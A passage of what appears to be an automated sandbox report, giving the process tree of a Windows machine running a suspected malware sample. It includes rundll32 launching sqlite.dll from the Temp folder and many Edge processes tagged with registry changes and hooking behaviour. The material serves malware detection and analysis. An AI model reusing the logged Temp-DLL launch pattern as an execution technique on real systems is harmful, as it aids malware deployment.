                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
